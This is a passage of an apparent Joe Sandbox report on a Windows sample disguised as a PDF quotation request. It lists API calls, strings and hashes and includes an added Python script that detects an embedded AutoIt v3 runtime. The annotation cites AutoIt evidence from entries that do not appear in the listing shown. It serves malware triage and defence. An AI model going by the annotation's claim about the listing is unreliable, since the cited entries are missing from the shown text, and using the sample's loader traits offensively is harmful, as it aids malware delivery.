                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window
                                                                    • String ID: 0
                                                                    • API String ID: 2353593579-4108050209
                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                    APIs
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                    • String ID:
                                                                    • API String ID: 1744303182-0
                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                    • API String ID: 4163708885-3819984048
                                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
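Two of the entries above carry the evidence a triager wants from this listing: the CreateWindowExW call whose window class is "AutoIt v3 GUI", and the function whose strings are [CLASS:, [HANDLE:, [REGEXPTITLE:, [ACTIVE, [LAST and [ALL, the WinTitle descriptors understood by AutoIt v3's window matcher. Together they identify an embedded AutoIt3 runtime. The GetProcAddress lookups of FlsAlloc, FlsGetValue, FlsSetValue and FlsFree next to __mtterm in the entry just above are, by contrast, the statically linked Visual C++ runtime probing for fiber-local storage during thread initialisation and are not an indicator on their own. The script below is an added example and not Joe Sandbox code: it parses listings in the page's bullet format (API name, module, arguments and ref address, the indented "Part of subcall function" lines, "$"-separated String IDs, each entry closed by its Instruction Fuzzy Hash line) and reports the AutoIt markers and the imports resolved at runtime. SAMPLE is constructed from three of the page's entries, trimmed; the field layout it assumes is the one visible on this page.

```python
"""Parse Joe Sandbox per-function API/string listings and flag AutoIt v3 runtime markers.

Added example, not Joe Sandbox code. Input is the bullet listing format shown on the
page; SAMPLE is constructed from three of the page's entries (trimmed).
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", or the indented
# "• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR" form.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

AUTOIT_GUI_CLASS = "AutoIt v3 GUI"   # window class the AutoIt3 runtime creates for its GUI
# WinTitle "advanced window description" prefixes used by AutoIt's window matcher
AUTOIT_WINTITLE = {"[CLASS:", "[HANDLE:", "[REGEXPTITLE:", "[ACTIVE", "[LAST", "[ALL"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""


def parse_listing(text: str) -> list:
    """Split the listing into per-function entries; each entry ends at its Instruction Fuzzy Hash."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_LINE.match(line)
        if not f:
            continue
        if f["key"] == "String ID":
            cur.strings = [s for s in f["val"].split("$") if s]   # "$" separates strings
        elif f["key"] == "Opcode ID":
            cur.opcode_id = f["val"]
        elif f["key"] == "Instruction Fuzzy Hash":                  # last line of an entry
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def dynamic_imports(entries) -> set:
    """Names resolved at runtime via GetProcAddress (its second argument)."""
    return {c.args[1] for e in entries for c in e.calls
            if c.name == "GetProcAddress" and len(c.args) > 1}


def autoit_indicators(entries) -> dict:
    """Evidence of an embedded AutoIt3 runtime: the GUI class passed to CreateWindowExW
    plus the WinTitle descriptor strings. Both are required so a lone string hit does not fire."""
    gui_refs, descriptors = [], set()
    for e in entries:
        gui_refs += [c.ref for c in e.calls
                     if c.name == "CreateWindowExW" and AUTOIT_GUI_CLASS in c.args]
        descriptors.update(s for s in e.strings if s in AUTOIT_WINTITLE)
    return {"gui_class_refs": gui_refs, "wintitle_descriptors": descriptors,
            "is_autoit": bool(gui_refs) and bool(descriptors)}


# Constructed from three entries of the page's listing, trimmed to a few lines each.
SAMPLE = """APIs
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Strings
• String ID: @$AutoIt v3 GUI
• Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
• Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
APIs
Strings
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetCurrentThreadId.KERNEL32 ref: 00417D80
• Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
"""

if __name__ == "__main__":
    ents = parse_listing(SAMPLE)
    print(len(ents), "functions;", sum(len(e.calls) for e in ents), "API calls")
    print("runtime-resolved imports:", sorted(dynamic_imports(ents)))
    print("AutoIt:", autoit_indicators(ents))
```

Point it at the whole listing saved as text to get the same result for every function in the report. A positive is_autoit says the loader is an AutoIt-compiled executable; it says nothing about the script it runs or the payload it injects, which needs the decompiled script, and the FLS names in dynamic_imports are expected CRT behaviour rather than an evasion signal.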
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2485277191-404129466
                                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                    APIs
                                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00464B28
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                    • _wcslen.LIBCMT ref: 00464C28
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                                    • String ID: D
                                                                    • API String ID: 1914653954-2746444292
                                                                    • Opcode ID: a7ea6aefa912430eef03ba2b36caf654fab562442e98e67eded85c7306b6573f
                                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                    • Opcode Fuzzy Hash: a7ea6aefa912430eef03ba2b36caf654fab562442e98e67eded85c7306b6573f
                                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll
                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                    • API String ID: 3832890014-4202584635
                                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                    • GetFocus.USER32 ref: 0046A0DD
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$CtrlFocus
                                                                    • String ID: 0
                                                                    • API String ID: 1534620443-4108050209
                                                                    • Opcode ID: 33db1e756ee58dcd531973e3b0852dc20df7a040fb788c70bc5d22ec5941dbda
                                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                    • Opcode Fuzzy Hash: 33db1e756ee58dcd531973e3b0852dc20df7a040fb788c70bc5d22ec5941dbda
                                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                    APIs
                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateDestroy
                                                                    • String ID: ,$tooltips_class32
                                                                    • API String ID: 1109047481-3856767331
                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 1441871840-4108050209
                                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
